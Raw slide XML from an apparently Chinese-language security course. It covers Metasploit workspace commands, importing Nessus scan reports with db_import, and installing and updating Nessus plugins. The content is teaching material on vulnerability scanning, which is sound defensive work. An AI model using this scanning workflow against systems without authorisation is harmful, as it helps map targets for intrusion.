              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A3F2BDE-604A-3CC5-1396-21F4BD4BD33F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="902857" y="2592888"/>
            <a:ext cx="4822520" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>workspace –a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>workspace –d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>workspace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>工作区</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>workspace -v</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>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20543373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4134392C-7D6A-66B2-2681-CF01EF471D0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="310680" y="2133483"/>
            <a:ext cx="10193338" cy="259103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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>导入扫描报告</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>db_import</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80E73A2A-55FF-0F46-801E-3BF0BF709A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4147094" y="981498"/>
            <a:ext cx="7533809" cy="5786659"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3186173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44379" y="1099972"/>
            <a:ext cx="8229600" cy="873208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1800" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1800" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1800" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>扫描漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="712871" y="2006566"/>
            <a:ext cx="10766258" cy="3451225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是目前全世界最多人使用的系统漏洞扫描与分析软件。该工具提供了完整的漏洞扫描服务，并随时更新其漏洞数据库。而且，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可同时在本机操作或远程控制，进行系统的漏洞分析扫描。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E80F020-318D-032B-D4C1-D96BA716D1C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="825928" y="4015570"/>
            <a:ext cx="10148364" cy="29512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base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Downloading  Nessus:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="5A5A5A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="微软雅黑"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.tenable.com/products/nessus/select-your-operating-system</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="5A5A5A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="微软雅黑"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="5A5A5A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="微软雅黑"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" marR="0" lvl="0" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>安装插件：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t># /opt/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>nessuscli</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> update all-2.0.tar.gz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t># /opt/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>nessuscli</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5A5A5A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> fetch --register-offline </a:t>
            </a:r>
          </a:p>
          <a:p>
